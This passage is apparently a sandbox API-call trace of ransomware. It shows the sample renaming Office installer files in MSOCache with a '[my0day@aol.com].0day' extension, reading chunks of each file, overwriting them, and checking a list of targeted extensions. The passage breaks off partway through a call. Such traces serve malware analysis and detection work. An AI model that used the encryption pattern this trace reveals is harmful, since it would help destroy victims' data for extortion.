4 [0041.703] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.703] lstrlenW (lpString=".1cd") returned 4 [0041.703] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0041.703] lstrlenW (lpString=".jpg") returned 4 [0041.703] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.703] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0041.703] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0041.703] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0041.704] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3124224) returned 1 [0041.704] CloseHandle (hObject=0x1a0) returned 1 [0041.704] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0041.704] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.704] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0041.704] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0041.705] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.705] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.705] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.709] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.709] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.716] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.716] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.716] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.731] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.731] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc010a, lpOverlapped=0x0) returned 1 [0042.019] SetEndOfFile (hFile=0x1a0) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b8 [0042.030] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.030] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.032] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.032] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.036] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.037] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.038] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b8 | out: hHeap=0x5f0000) returned 1 [0042.038] CloseHandle (hObject=0x1a0) returned 1 [0042.052] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.052] lstrlenW (lpString=".doc") returned 4 [0042.052] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.052] lstrlenW (lpString=".docx") returned 5 [0042.052] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.052] lstrlenW (lpString=".pdf") returned 4 [0042.052] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.052] lstrlenW (lpString=".xls") returned 4 [0042.052] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.052] lstrlenW (lpString=".xlsx") returned 5 [0042.052] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.052] lstrlenW (lpString=".ppt") returned 4 [0042.052] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.052] lstrlenW (lpString=".zip") returned 4 [0042.052] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.052] lstrlenW (lpString=".rar") returned 4 [0042.052] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.052] lstrlenW (lpString=".bz2") returned 4 [0042.052] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.052] lstrlenW (lpString=".7z") returned 3 [0042.052] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".dbf") returned 4 [0042.053] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".1cd") returned 4 [0042.053] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".jpg") returned 4 [0042.053] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".doc") returned 4 [0042.053] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.053] lstrlenW (lpString=".docx") returned 5 [0042.053] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.053] lstrlenW (lpString=".pdf") returned 4 [0042.053] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.053] lstrlenW (lpString=".xls") returned 4 [0042.053] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.053] lstrlenW (lpString=".xlsx") returned 5 [0042.053] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.053] lstrlenW (lpString=".ppt") returned 4 [0042.053] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".zip") returned 4 [0042.053] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.053] lstrlenW (lpString=".rar") returned 4 [0042.053] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.053] lstrlenW (lpString=".bz2") returned 4 [0042.053] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.053] lstrlenW (lpString=".7z") returned 3 [0042.053] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.053] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.053] lstrlenW (lpString=".dbf") returned 4 [0042.053] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.054] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.054] lstrlenW (lpString=".1cd") returned 4 [0042.054] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.054] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.054] lstrlenW (lpString=".jpg") returned 4 [0042.054] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.054] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0042.054] lstrlenW (lpString="VisioMUI.msi") returned 12 [0042.054] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0042.054] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2797568) returned 1 [0042.054] CloseHandle (hObject=0x1a0) returned 1 [0042.054] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0042.054] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.054] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.055] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0042.055] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.055] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.055] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.262] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.262] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.270] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.270] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.270] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.284] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.284] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0042.300] SetEndOfFile (hFile=0x1a0) returned 1 [0042.300] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b8 [0042.300] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.300] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.301] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.301] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.539] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.539] WriteFile (in: hFile=0x1a0, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.541] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b8 | out: hHeap=0x5f0000) returned 1 [0042.541] CloseHandle (hObject=0x1a0) returned 1 [0042.541] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.541] lstrlenW (lpString=".doc") returned 4 [0042.541] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.541] lstrlenW (lpString=".docx") returned 5 [0042.541] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.542] lstrlenW (lpString=".pdf") returned 4 [0042.542] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.542] lstrlenW (lpString=".xls") returned 4 [0042.542] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.542] lstrlenW (lpString=".xlsx") returned 5 [0042.542] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.542] lstrlenW (lpString=".ppt") returned 4 [0042.542] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString=".zip") returned 4 [0042.542] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.542] lstrlenW (lpString=".rar") returned 4 [0042.542] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.542] lstrlenW (lpString=".bz2") returned 4 [0042.542] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.542] lstrlenW (lpString=".7z") returned 3 [0042.542] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString=".dbf") returned 4 [0042.542] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString=".1cd") returned 4 [0042.542] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString=".jpg") returned 4 [0042.542] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.542] lstrlenW (lpString=".doc") returned 4 [0042.542] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.542] lstrlenW (lpString=".docx") returned 5 [0042.542] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.542] lstrlenW (lpString=".pdf") returned 4 [0042.542] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.543] lstrlenW (lpString=".xls") returned 4 [0042.543] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.543] lstrlenW (lpString=".xlsx") returned 5 [0042.543] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.543] lstrlenW (lpString=".ppt") returned 4 [0042.543] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.543] lstrlenW (lpString=".zip") returned 4 [0042.543] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.543] lstrlenW (lpString=".rar") returned 4 [0042.543] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.543] lstrlenW (lpString=".bz2") returned 4 [0042.543] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.543] lstrlenW (lpString=".7z") returned 3 [0042.543] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.543] lstrlenW (lpString=".dbf") returned 4 [0042.543] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.543] lstrlenW (lpString=".1cd") returned 4 [0042.543] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.543] lstrlenW (lpString=".jpg") returned 4 [0042.543] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.543] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0042.543] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0042.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0042.671] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2511872) returned 1 [0042.671] CloseHandle (hObject=0x1d8) returned 1 [0042.671] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0042.671] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.671] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.672] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0042.672] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.672] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.672] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.731] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.731] ReadFile (in: hFile=0x1d8, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.757] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.757] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.757] ReadFile (in: hFile=0x1d8, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.777] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.777] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: 